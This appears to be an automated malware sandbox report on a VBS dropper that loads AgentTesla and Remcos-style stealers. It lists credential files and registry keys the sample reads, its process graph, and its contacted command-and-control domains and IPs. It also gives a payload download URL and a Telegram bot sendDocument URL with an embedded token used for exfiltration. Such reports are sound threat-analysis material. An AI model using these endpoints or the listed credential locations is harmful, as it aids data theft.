Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected AgentTesla
Source: Yara match File source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755530 Sample: IMG_2022028022-0120.vbs Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 42 myfrontmannyfive.ddns.net 2->42 44 backupfrontmanny.duckdns.org 2->44 46 6 other IPs or domains 2->46 66 Snort IDS alert for network traffic 2->66 68 Multi AV Scanner detection for domain / URL 2->68 70 Yara detected GuLoader 2->70 72 6 other signatures 2->72 12 wscript.exe 1 1 2->12         started        signatures3 process4 signatures5 84 Wscript starts Powershell (via cmd or directly) 12->84 86 Obfuscated command line found 12->86 88 Very long command line found 12->88 15 powershell.exe 7 12->15         started        process6 signatures7 92 Very long command line found 15->92 18 powershell.exe 15->18         started        20 conhost.exe 15->20         started        process8 process9 22 ieinstal.exe 8 8 18->22         started        dnsIp10 48 myfrontmannyfive.ddns.net 37.0.14.209, 4939, 49815, 49818 WKD-ASIE Netherlands 22->48 50 backupfrontmanny.duckdns.org 84.38.134.104, 4939, 49814, 49816 DATACLUBLV Latvia 22->50 52 sinopbisikletkiralama.com 172.67.169.218, 49811, 80 CLOUDFLARENETUS United States 22->52 74 Creates multiple autostart registry keys 22->74 76 Tries to detect Any.run 22->76 26 wscript.exe 1 1 22->26         started        signatures11 process12 signatures13 78 Wscript starts Powershell (via cmd or directly) 26->78 80 Obfuscated command line found 26->80 82 Very long command line found 26->82 29 powershell.exe 15 26->29         started        process14 signatures15 90 Tries to detect Any.run 29->90 32 CasPol.exe 17 11 29->32         started        36 CasPol.exe 29->36         started        38 conhost.exe 29->38         started        process16 dnsIp17 40 api.telegram.org 149.154.167.220, 443, 49881 TELEGRAMRU United Kingdom 32->40 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 32->54 56 Tries to steal Mail credentials (via file / registry access) 32->56 58 Creates multiple autostart registry keys 32->58 64 4 other signatures 32->64 60 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->60 62 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 36->62 signatures18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
37.0.14.209
 myfrontmannyfive.ddns.net Netherlands
198301 WKD-ASIE true
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
84.38.134.104
 backupfrontmanny.duckdns.org Latvia
52048 DATACLUBLV true
172.67.169.218
 sinopbisikletkiralama.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
myfrontmannyfive.ddns.net 37.0.14.209 true
backupfrontmanny.duckdns.org 84.38.134.104 true
sinopbisikletkiralama.com 172.67.169.218 true
api.telegram.org 149.154.167.220 true
f65kcg.am.files.1drv.com unknown unknown
onedrive.live.com unknown unknown
f64nqg.am.files.1drv.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sinopbisikletkiralama.com/Bichloride.vbs true
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot2135733177:AAGBiQMSb9sct4MUL0kpdpB0pPO3n3AKBfA/sendDocument false
    		high